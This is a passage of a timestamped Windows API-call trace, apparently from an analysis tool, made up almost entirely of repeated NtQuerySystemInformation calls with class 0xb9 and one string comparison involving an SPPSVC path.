Length=0x28, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x38, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca00, Length=0x20, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x58, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x28, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8d0, Length=0x20, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9d0, Length=0x20, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf38, Length=0x50, ResultLength=0x0) [0286.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc90, Length=0x28, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0286.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x28, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0286.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x38, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x20, ResultLength=0x0) [0286.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x20, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0286.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0286.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.850] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0286.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc8, Length=0x50, ResultLength=0x0) [0286.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0286.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0286.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x38, ResultLength=0x0) [0286.856] NtQuerySystemInformation 